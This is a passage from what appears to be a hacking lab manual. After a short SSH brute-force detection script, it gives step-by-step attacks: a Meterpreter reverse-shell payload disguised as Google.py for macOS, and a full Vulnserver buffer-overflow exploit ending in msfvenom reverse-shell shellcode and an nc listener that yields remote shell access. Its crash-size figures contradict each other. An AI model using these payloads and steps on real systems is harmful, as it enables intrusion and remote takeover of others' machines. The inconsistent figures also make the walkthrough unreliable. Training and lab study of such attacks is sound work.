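        ts = datetime.strptime(" ".join(m["ts"].split()), "%b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"], m["method"]))
    return events

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag each source IP with >= threshold password failures inside any window_seconds
    span, noting whether a password login from that IP then succeeded within the window."""
    by_ip = defaultdict(list)
    for ev in parse_events(log_text):
        by_ip[ev[1]].append(ev)
    alerts = []
    for ip, evs in sorted(by_ip.items()):
        evs.sort(key=lambda e: e[0])
        failures = [e for e in evs if e[3] == "Failed"]
        start, burst = 0, 0  # sliding window: largest burst of failures
        for end in range(len(failures)):
            while (failures[end][0] - failures[start][0]).total_seconds() > window_seconds:
                start += 1
            burst = max(burst, end - start + 1)
        if burst < threshold:
            continue
        last_fail = failures[-1][0]
        success = any(
            e[3] == "Accepted" and e[4] == "password"
            and 0 <= (e[0] - last_fail).total_seconds() <= window_seconds
            for e in evs
        )
        alerts.append({
            "source_ip": ip,
            "targeted_users": sorted({e[2] for e in failures}),
            "failures_in_window": burst,
            "password_success_after_burst": success,
        })
    return alerts
```

A burst that ends in a password success is the case to escalate first; a burst with no success is still worth blocking at the firewall or with a tool such as fail2ban.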

Part 4.13: Hacking macOS and Linux Systems

Both macOS and Linux are operating systems that belong to the family of Unix-
like operating systems. While they share some similarities, there are also some
key differences between the two.

macOS, previously known as Mac OS X, is the operating system developed by
Apple Inc. for its line of Macintosh computers. It is a proprietary operating system,
meaning that it is developed and distributed exclusively by Apple. macOS is
known for its sleek and intuitive graphical user interface (GUI) that is designed
to be easy to use, even for people who are not technically inclined. It is also known
for its compatibility with a wide range of hardware and software products, which
makes it a popular choice for creative professionals such as designers, video
editors, and musicians.

Linux, on the other hand, is an open-source operating system that is based on the
Unix operating system. It is developed collaboratively by a community of
programmers and is available for free. Linux is known for its stability, security,
and customizability. It is used in a wide range of applications, from servers to
desktop computers to embedded devices like smartphones and routers. Linux is
also popular among developers and programmers because of its command-line
interface (CLI) and the vast array of tools and utilities available to them.

One key difference between macOS and Linux is that macOS is developed and
distributed exclusively by Apple, while Linux is developed collaboratively by a
community of programmers and is available for free. Another difference is that
macOS is designed to run only on Apple hardware, while Linux can run on a wide
range of hardware platforms. Finally, macOS is known for its user-friendly GUI,
while Linux is known for its flexibility and customizability.

1- Open a terminal and type msfvenom --payload python/meterpreter/reverse_tcp
LHOST=<IP Address> LPORT=4444 > Google.py

2- Start Metasploit by typing msfconsole and set up the attack parameters:

• Set PAYLOAD python/meterpreter/reverse_tcp
• Set LHOST <IP Address of the attacker>
• Set LPORT 4444

3- Now, type exploit.

4- Meanwhile, transfer the payload to the macOS system, open the terminal, type
python3 <path to the payload>, and press Enter.

5- You now have access to the macOS system.

6- This concludes the demonstration of hacking macOS and Linux systems.

Part 4.14: Perform Buffer Overflow Attack to Gain Access to a Remote
System

This task demonstrates the exploitation procedure applied to a vulnerable server
running on the victim’s system. This vulnerable server is attached to Immunity
Debugger. As an attacker, we will exploit this server using a malicious script to gain
remote access to the victim’s system.

1- Open any web browser, access the following link, and download
Vulnserver (https://github.com/stephenbradshaw/vulnserver) by clicking
Download ZIP.

2- Go to Downloads > Vulnserver-master and execute vulnserver.exe. The
Windows Security Alert window appears; click Allow access.

3- Vulnserver starts running, as shown in the screenshot.

4- Open any web browser, access the following link
(https://debugger.immunityinc.com/ID_register.py), fill in the required
information, and press download.

5- The Immunity Debugger Setup: License Agreement window appears; click
the I accept checkbox and then click Next.

6- Now, click File in the menu bar, and in the drop-down menu, click Attach.

7- The Select process to attach pop-up appears; click the vulnserver process
and click Attach.

8- The Immunity Debugger window showing the vulnserver.exe process
appears, as shown in the screenshot.
9- You can observe that the status is Paused in the bottom-right corner of the
window.

10- Click on the Run program icon ( ) in the toolbar to run Immunity.

11- Keep Immunity Debugger and Vulnserver running, and switch to the Kali
Linux virtual machine.
12- In the Terminal window, type nc -nv 10.10.10.10 9999 and press Enter.

Note: Here, 10.10.10.10 is the IP address of the target machine (Windows
10) and 9999 is the target port. Check the IP address of your host that runs vulnserver.

13- Type HELP and a list of Valid Commands is displayed, as shown in the
screenshot.

14- Open the following link to download fuzz.py:
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EdxBLJpQCAFAnWxr0J0NHtMBsgmgc5mTVbemI4d_2kbbWQ?e=tUhr3C)
15- In the terminal, type python3 fuzz.py, then provide your vulnserver IP
address.
16- A message appears, saying that the vulnerable server crashed after
receiving approximately 43800 bytes of data, but it did not overwrite the
EIP register.

Note: The byte size might differ in your lab environment.

17- Re-launch both Immunity Debugger and the vulnerable server as an
administrator. Now, attach the vulnserver process to Immunity Debugger and
click the Run program icon ( ) in the toolbar to run Immunity Debugger.

18- Through fuzzing, we have understood that we can overwrite the EIP register
with 1 to 5100 bytes of data. Now, we will use the pattern_create Ruby tool to
generate random bytes of data.

19- In the Terminal window, type /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <number of bytes that
caused a crash + 100> and press Enter.
Note: -l: length, 34900: byte size (here, we take the nearest even-number value
of the byte size obtained in the previous step).

20- It generates the pattern of bytes; right-click on it, click Copy to
copy it, and close the Terminal window.

21- Now, download attack.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EWK_1i2FOLJPvuU4c3U4CQsBROb_ntfH5O311uppE_RAhw?e=ELAmcB),
and type in the terminal mousepad attack.py.

22- Paste the data generated in step 20 into the offset variable, then save the file.

23- In the terminal, type python3 attack.py, then provide the vulnserver IP.

24- In the Immunity Debugger window, you can observe that the EIP register is
overwritten with random bytes. Note down the random bytes in the EIP and
find the offset of those bytes.

25- In the Terminal window, type /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 34900 -q 386F4337 and press
Enter.
Note: the value queried here (386F4337) is the EIP register value you read from
Immunity Debugger in the previous step and depends on your result.

26- A result appears, indicating that the identified EIP register is at an offset of
2003 bytes, as shown in the screenshot.
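Steps 19 to 26 rely on Metasploit's pattern tools. The Python below, added here as an example and not code from the manual or Metasploit's own implementation, reproduces their logic to show why the EIP value 386F4337 yields offset 2003: the pattern is built from unique Upper/lower/digit triplets, and x86 stores the dword little-endian, so the debugger's EIP read backwards is the pattern substring "7Co8".

```python
import string

# Alphabet order used by pattern_create.rb: every 3-byte triplet is
# <Upper><lower><digit>, so any 4-byte window is unique within one 20280-byte cycle.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
CYCLE = "".join(u + l + d for u in UPPER for l in LOWER for d in DIGITS)  # 20280 bytes


def pattern_create(length):
    """Same output as pattern_create.rb -l LENGTH. The cycle repeats past 20280
    bytes, which is why a 34900-byte pattern gives two matches for one EIP value."""
    reps = length // len(CYCLE) + 1
    return (CYCLE * reps)[:length]


def eip_to_bytes(eip_hex):
    """Immunity prints EIP as a big-endian number, but the CPU loaded it from four
    little-endian bytes: 386F4337 -> 37 43 6F 38 -> "7Co8" as written on the stack."""
    if eip_hex.lower().startswith("0x"):
        eip_hex = eip_hex[2:]
    return bytes.fromhex(eip_hex)[::-1].decode("ascii")


def pattern_offset(length, eip_hex):
    """Same answer as pattern_offset.rb -l LENGTH -q EIP: every offset at which the
    four bytes that landed in EIP occur in the pattern."""
    needle = eip_to_bytes(eip_hex)
    pat = pattern_create(length)
    return [i for i in range(len(pat) - len(needle) + 1) if pat.startswith(needle, i)]


def triplet_start(triplet):
    """Offset where a given <Upper><lower><digit> triplet begins in the first cycle.
    "7Co8" is the tail of "Co7" plus the head of "Co8", so the EIP offset is
    triplet_start("Co7") + 2 = (2*260 + 14*10 + 7)*3 + 2 = 2003."""
    u, l, d = triplet
    return (UPPER.index(u) * 260 + LOWER.index(l) * 10 + DIGITS.index(d)) * 3
```

If the tool reports more than one exact match, the pattern was longer than one cycle; the smallest offset is the one that fits the crash size found by fuzzing.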

27- Now, download overwrite.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EUNEYal3w4RMu48nGEjMJLQBrGUb2O0GpdxCtWWBJKKdvg?e=K9WSSG)

28- Re-launch both Immunity Debugger and the vulnerable server as an
administrator. Now, attach the vulnserver process to Immunity Debugger and
click the Run program icon ( ) in the toolbar to run Immunity Debugger.
29- Open overwrite.py and replace the offset 2003 with the offset you got in the
analysis. Then, type in the terminal python3 overwrite.py.

30- Switch to the Windows 10 machine. You can observe that the EIP register is
overwritten, as shown in the screenshot.

Note: The result indicates that the EIP register can be controlled and overwritten
with malicious shellcode.

31- Re-launch both Immunity Debugger and the vulnerable server as an
administrator. Now, attach the vulnserver process to Immunity Debugger and
click the Run program icon ( ) in the toolbar to run Immunity Debugger.
32- Now, before injecting the shellcode into the EIP register, we must first
identify bad characters that may cause issues in the shellcode.
Note: You can obtain the badchars through a Google search. Characters such as
the null byte, i.e., "\x00", are badchars.
33- Now, download badchars.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/ETu0cgx7FFtNtHegVWLFfbEBHAhzVpVHGY2cV2mFYwzXGw?e=W3owh5),
and don’t forget to change the offset 2003 to the one you got during the analysis.
34- In the terminal, type python3 badchars.py

35- Switch to the Windows 10 machine.


36- In Immunity Debugger, click on the ESP register value in the top-right
window. Right-click on the selected ESP register value and click the
Follow in Dump option.

37- In the left-corner window, you can observe that there are no badchars that
cause problems in the shellcode, as shown in the screenshot.

38- Re-launch both Immunity Debugger and the vulnerable server as an
administrator. Now, attach the vulnserver process to Immunity Debugger.

39- Now, download mona.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EYo0c_q7YDtCobLsaQgGBwYBAApVCd5W3Z2T6syCqlvvpQ?e=qkROm6)

40- Copy the mona.py script and paste it into the location C:\Program Files
(x86)\Immunity Inc\Immunity Debugger\PyCommands.

41- Switch to the Immunity Debugger window. In the text field at the
bottom of the window, type !mona modules and press Enter.

42- The Log data pop-up window appears, which shows the protection settings of
various modules.
43- You can observe that there is no memory protection for the module
essfunc.dll, as shown in the screenshot.

44- Now, we will exploit the essfunc.dll module to inject shellcode and take full
control of the EIP register.
45- In the Terminal window, type /usr/share/metasploit-
framework/tools/exploit/nasm_shell.rb and press Enter.
Note: This script is used to convert assembly language into hex code.
46- The nasm command line appears; type JMP ESP and press Enter.
47- The result appears, displaying the hex code of JMP ESP (here, FFE4).
Note: Note down this hex code value.

48- Type exit, and switch back to the Windows 10 machine.


49- In the Immunity Debugger window, type !mona find -s "\xff\xe4" -m
essfunc.dll in the text field at the bottom of the window and press Enter.
50- The result appears, displaying the return address of the vulnerable module, as
shown in the screenshot.

Note: Here, the return address of the vulnerable module is 0x625011af, which
might differ in your lab environment.

51- Close Immunity Debugger and the vulnerable server process.


52- Re-launch both Immunity Debugger and the vulnerable server as an
administrator. Now, attach the vulnserver process to Immunity Debugger.
53- In the Immunity Debugger window, click the Go to address in
Disassembler icon ( ).

54- The Enter expression to follow pop-up appears; enter the identified return
address in the text box (here, 625011af) and click OK.

55- You are taken to the JMP ESP instruction at 625011af; press F2 to set a breakpoint at the
selected address, as shown in the screenshot.

56- Now, click on the Run program icon ( ) in the toolbar to run Immunity.
57- Now switch to Kali Linux and download jump.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EQrum-AoNLpJn66W4AfnLiYB5CJF1UsjVtgtR5kt-h3J-w?e=Nh5DRr)
58- In the Terminal, type python3 jump.py

59- In the Immunity Debugger window, you will observe that the EIP register
has been overwritten with the return address of the vulnerable module, as
shown in the screenshot.
Note: You can control the EIP register if the target server has modules without
proper memory protection settings.

60- Close Immunity Debugger and the vulnerable server process.


61- Re-launch both Immunity Debugger and the vulnerable server.
62- Switch to Kali Linux.
63- In the Terminal window, use the following command and press Enter to
generate the shellcode: msfvenom -p windows/shell_reverse_tcp
LHOST=<Local IP Address> LPORT=<Listening Port> EXITFUNC=thread
-f c -a x86 -b "\x00"
Note: Here, -p: payload, local IP address: 10.10.10.13, listening port: 4444, -f:
file type, -a: architecture, -b: bad character.
64- A shellcode is generated, as shown in the screenshot.
65- Select the code, right-click on it, and click Copy to copy the code.

66- Now, download shellcode.py from
(https://udksa-my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/Ee2FaFNs-1VAnaj8S6EHYpcB1GfXo1Lvyhpi4V3C39-kbA?e=mNCDes)
67- Type mousepad shellcode.py; the shellcode.py file appears in the text
editor window, as shown in the screenshot.

68- Now, paste the shellcode copied in Step 65 into the overflow option (Line 4);
then, press Ctrl+S to save the file and close it.

69- In the Terminal window, type nc -nvlp 4444 and press Enter. Netcat will start
listening on port 4444, as shown in the screenshot.

70- Switch back to the other Terminal window. Type chmod +x shellcode.py and
press Enter to change the mode to execute the Python script.
71- Type ./shellcode.py and press Enter to execute the Python script.

72- Now, switch back to the Terminal running the Netcat command.
73- You can observe that shell access to the target vulnerable server has been
established, as shown in the screenshot.

74- Now, type whoami and press Enter to display the username of the current
user.

75- This concludes the demonstration of performing a buffer overflow attack to
gain access to a remote system.
